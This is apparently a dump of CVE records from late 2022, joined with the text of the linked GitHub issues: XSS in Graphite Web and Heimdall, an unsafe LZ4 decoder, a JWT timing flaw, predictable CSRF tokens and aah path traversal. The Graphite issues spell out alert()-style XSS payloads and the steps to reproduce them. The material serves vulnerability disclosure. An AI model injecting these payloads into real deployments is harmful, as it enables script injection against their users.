"url": "https://github.com/Morgawr/Muon/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216877"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216877"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muon_project:muon:0.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "85B7C5B5-4707-45DE-8FDD-015261871D38",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"330"
] | 330 | https://github.com/Morgawr/Muon/issues/4 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Morgawr",
"Muon"
] | Since muon uses a very naive indexing implementation, it is possible to index results by simply crawling through all of them one by one.
We should use a proper filename randomization option instead. | Security Vulnerability: File Indexing Attack | https://api.github.com/repos/Morgawr/Muon/issues/4/comments | 0 | 2019-04-10T08:59:39Z | 2019-04-13T14:37:31Z | https://github.com/Morgawr/Muon/issues/4 | 431,384,935 | 4 | 4,549 |
CVE-2022-4728 | 2022-12-27T15:15:12.373 | A vulnerability has been found in Graphite Web and classified as problematic. This vulnerability affects unknown code of the component Cookie Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. VDB-216742 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2744"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216742"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2744"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216742"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:graphite_project:graphite:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3EFF3851-87AE-4730-9FC1-42E7715294B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/graphite-project/graphite-web/issues/2744 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"graphite-project",
"graphite-web"
] | **Describe the bug**
It's possible to execute JS on application context by modifying the "Relative Time Range"
**To Reproduce**
Access to a graphite-web instance (i.e. http://localhostdashboard/). You don't really need data in it.
- Go to http://localhost/dashboard/
- Click on "Relative Time Range"
- Enter in "Show the past":
`<noscript><p title="</noscript><img src=x onerror=alert() onmouseover=alert()>">"`
- Now there will always be XSS when you go to http://localhost/dashboard/
- It's connected with cookie **ys-defaultGraphParams**
- After performing all the actions, its value becomes:
`s%3A%7B%22from%22%3A%22-2%3Cnoscript%3E%3Cp%20title%3D%5C%22%3C/noscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%29%20onmouseover%3Dalert%28%29%3E%5C%22%3E%5C%22hours%22%2C%22until%22%3A%22now%22%2C%22width%22%3A400%2C%22height%22%3A250%7D`
**Expected behavior**
This can be solved by removing or ignoring requests containing the characters "<" ">" and/or other escaping/scripting characters. -> Sanitize the value before using it.
**Screenshots**



**Environment (please complete the following information):**
- OS flavor: Debian
- Graphite-web version [1.1.8-8]
- Django/Python version N/A but confirmed on 1.08-1.11/2.7, 2.1/3.6
- Setup type: docker
**Additional context**
Add any other context about the problem here.
| [BUG] Stored XSS in cookie | https://api.github.com/repos/graphite-project/graphite-web/issues/2744/comments | 1 | 2022-04-13T06:41:02Z | 2022-11-06T18:20:16Z | https://github.com/graphite-project/graphite-web/issues/2744 | 1,202,830,845 | 2,744 | 4,550 |
CVE-2022-4729 | 2022-12-27T15:15:12.457 | A vulnerability was found in Graphite Web and classified as problematic. This issue affects some unknown processing of the component Template Name Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216743. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2745"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216743"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2745"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216743"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:graphite_project:graphite:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3EFF3851-87AE-4730-9FC1-42E7715294B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/graphite-project/graphite-web/issues/2745 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"graphite-project",
"graphite-web"
] | **Describe the bug**
It's possible to execute JS on application context by modifying the API query values when saving a template.
**To Reproduce**
Access to a new dashboard in graphite-web instance (i.e. http://localhost/dashboard). You don't really need data in it.
Use the "Save As Template " feature (In the context menu Dashboard > Save As Template ). Give it a name.
`<img src=1 onerror=alert(1)>`
String to replace
`<img src=1 onerror=alert(1)>`
Use the "Template finder" feature (In the context menu Dashboard > Template finder ). You can see XSS
**Expected behavior**
This can be solved by removing or ignoring requests containing the characters "<" ">" and/or other escaping/scripting characters. -> Sanitize the value before using it.
**Screenshots**





**Environment (please complete the following information):**
- OS flavor: Debian 11
- Graphite-web version 1.1.8
- Setup type: docker
| [BUG] Stored XSS in template name | https://api.github.com/repos/graphite-project/graphite-web/issues/2745/comments | 1 | 2022-04-13T07:15:53Z | 2022-11-06T18:19:33Z | https://github.com/graphite-project/graphite-web/issues/2745 | 1,202,860,682 | 2,745 | 4,551 |
CVE-2022-4730 | 2022-12-27T15:15:12.543 | A vulnerability was found in Graphite Web. It has been classified as problematic. Affected is an unknown function of the component Absolute Time Range Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216744. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2746"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216744"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/commit/2f178f490e10efc03cd1d27c72f64ecab224eb23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/issues/2746"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/graphite-project/graphite-web/pull/2785"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216744"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:graphite_project:graphite:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3EFF3851-87AE-4730-9FC1-42E7715294B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/graphite-project/graphite-web/issues/2746 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"graphite-project",
"graphite-web"
] | **Describe the bug**
It's possible to execute JS on application context by modifying the "Absolute Time Range"
**To Reproduce**
Access to a new dashboard in graphite-web instance (i.e. http://localhost/dashboard).
Use the "Absolute Time Range"
Write in Start Date:
`<img src=1 onerror=alert()>`
Write in EndDate:
`<img src=1 onerror=alert()>`
Hover the mouse over these fields
**Expected behavior**
This can be solved by removing or ignoring requests containing the characters "<" ">" and/or other escaping/scripting characters. -> Sanitize the value before using it.
**Screenshots**


**Environment (please complete the following information):**
- OS flavor: Debian 11
- Graphite-web version 1.1.8
- Setup type: docker
| [BUG] Self-XSS in "Absolute Time Range" | https://api.github.com/repos/graphite-project/graphite-web/issues/2746/comments | 3 | 2022-04-13T07:39:37Z | 2022-11-14T06:25:27Z | https://github.com/graphite-project/graphite-web/issues/2746 | 1,202,883,973 | 2,746 | 4,552 |
CVE-2022-47968 | 2022-12-27T18:15:11.037 | Heimdall Application Dashboard through 2.5.4 allows reflected and stored XSS via "Application name" to the "Add application" page. The stored XSS will be triggered in the "Application list" page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linuxserver/Heimdall/issues/1086"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://samy.link/blog"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linuxserver/Heimdall/issues/1086"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://samy.link/blog"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxserver:heimdall_application_dashboard:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF0F79F5-9E75-4036-9424-67FDB78DD6DF",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.4",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/linuxserver/Heimdall/issues/1086 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"linuxserver",
"Heimdall"
] | Hello Team,
Found a reflected XSS in the "Add application" page. It is possible to inject JavaScript code in the "Application name" input.


Not a big deal I guess but still wanted to warn about it.
Edit: Found in version 2.5.4
| Reflected / Stored XSS - CVE-2022-47968 | https://api.github.com/repos/linuxserver/Heimdall/issues/1086/comments | 8 | 2022-12-27T07:28:23Z | 2023-01-09T22:56:19Z | https://github.com/linuxserver/Heimdall/issues/1086 | 1,511,519,857 | 1,086 | 4,553 |
CVE-2014-125026 | 2022-12-27T22:15:10.883 | LZ4 bindings use a deprecated C API that is vulnerable to memory corruption, which could lead to arbitrary code execution if called with untrusted user input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cloudflare/golz4/commit/199f5f7878062ca17a98e079f2dbe1205e2ed898"
},
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cloudflare/golz4/issues/5"
},
{
"source": "security@golang.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0022"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cloudflare/golz4/commit/199f5f7878062ca17a98e079f2dbe1205e2ed898"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cloudflare/golz4/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0022"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cloudflare:golz4:*:*:*:*:*:go:*:*",
"matchCriteriaId": "CF7258F9-47C1-4E63-A1FD-5BB5378558BA",
"versionEndExcluding": "2014-07-11",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cloudflare/golz4/issues/5 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cloudflare",
"golz4"
] | It seems this binding is using the unsafe version of the decoder (LZ4_uncompress). As a consequence, a malicious user could slip-in some forged input to trigger an attack.
As a way to improve security, it would be better to use the safe version instead.
The safe version is called LZ4_decompress_safe().
It's also recommended to update the C source to r119, which improves security for 32-bits systems.
| Use the secure decoder version | https://api.github.com/repos/cloudflare/golz4/issues/5/comments | 1 | 2014-07-11T14:16:22Z | 2014-07-11T15:51:12Z | https://github.com/cloudflare/golz4/issues/5 | 37,663,807 | 5 | 4,554 |
CVE-2015-10004 | 2022-12-27T22:15:10.947 | Token validation methods are susceptible to a timing side-channel during HMAC comparison. With a large enough number of requests over a low latency connection, an attacker may use this to determine the expected HMAC. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/robbert229/jwt/commit/ca1404ee6e83fcbafb66b09ed0d543850a15b654"
},
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/robbert229/jwt/issues/12"
},
{
"source": "security@golang.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0023"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/robbert229/jwt/commit/ca1404ee6e83fcbafb66b09ed0d543850a15b654"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/robbert229/jwt/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0023"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json_web_token_project:json_web_token:-:*:*:*:*:go:*:*",
"matchCriteriaId": "7D52A34D-2AF5-4373-8B69-4A4AC8A7711D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"668"
] | 668 | https://github.com/robbert229/jwt/issues/12 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"robbert229",
"jwt"
] | As described [here](https://www.reddit.com/r/golang/comments/2lu55c/restful_session_token/cly7mu6/), please change [your comparation](https://github.com/robbert229/jwt/blob/master/algorithms.go#L145) to default buildin [function](https://golang.org/pkg/crypto/hmac/#Equal) when hmac is used
With gratitude,
Vetcher | Secure problem | https://api.github.com/repos/robbert229/jwt/issues/12/comments | 2 | 2017-03-08T10:21:07Z | 2017-04-26T19:12:33Z | https://github.com/robbert229/jwt/issues/12 | 212,693,879 | 12 | 4,555 |
CVE-2016-15005 | 2022-12-27T22:15:11.003 | CSRF tokens are generated using math/rand, which is not a cryptographically secure random number generator, allowing an attacker to predict values and bypass CSRF protections with relatively few requests. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/commit/3776f338be48b5bc5e8cf9faff7851fc52a3f1fe"
},
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/issues/20"
},
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/pull/24"
},
{
"source": "security@golang.org",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0045"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/commit/3776f338be48b5bc5e8cf9faff7851fc52a3f1fe"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/issues/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dinever/golf/pull/24"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0045"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golf_project:golf:*:*:*:*:*:go:*:*",
"matchCriteriaId": "E8C3D7B1-B623-4B34-823C-2DCD94EAF18D",
"versionEndExcluding": "0.3.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/dinever/golf/issues/20 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dinever",
"golf"
] | [`randomBytes`](https://github.com/dinever/golf/blob/7a06be0db26a0fb2694cec1bf381ba75f254df87/xsrf.go#L11) in xsrf.go uses `math.rand` to generate CSRF tokens. This is unsafe/insecure, and because it is seeded with `time.UnixNano`, generates predictable results that would allow an attacker to bypass CSRF protection.
[`sessionID`](https://github.com/dinever/golf/blob/7a06be0db26a0fb2694cec1bf381ba75f254df87/session.go#L38) in session.go correctly uses `crypto/rand` to generate a session ID. You should split this code out and re-use it for both session ID generation _and_ CSRF token generation.
(You're also welcome to import or repurpose https://github.com/gorilla/csrf for this as well, which has some additional mitigations against CSRF bypass)
| Use crypto/rand instead of math/rand | https://api.github.com/repos/dinever/golf/issues/20/comments | 3 | 2016-04-25T15:33:25Z | 2020-08-17T02:06:15Z | https://github.com/dinever/golf/issues/20 | 150,901,151 | 20 | 4,556 |
CVE-2020-36559 | 2022-12-27T22:15:11.500 | Due to improper sanitization of user input, HTTPEngine.Handle allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/commit/881dc9f71d1f7a4e8a9a39df9c5c081d3a2da1ec"
},
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/issues/266"
},
{
"source": "security@golang.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/pull/267"
},
{
"source": "security@golang.org",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0033"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/commit/881dc9f71d1f7a4e8a9a39df9c5c081d3a2da1ec"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/issues/266"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/go-aah/aah/pull/267"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0033"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:aahframework:aah:*:*:*:*:*:go:*:*",
"matchCriteriaId": "D7F9E1A9-0E79-4115-B596-DAFFB5854FF0",
"versionEndExcluding": "0.12.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/go-aah/aah/issues/266 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"go-aah",
"aah"
] | <!-- Please answer these questions before submitting your issue. Thanks! -->
#### What version of aah are you using (`aah --version`)?
aah v0.12.3
cli v0.13.4
go v1.13.8
#### Does this issue reproduce with the latest release?
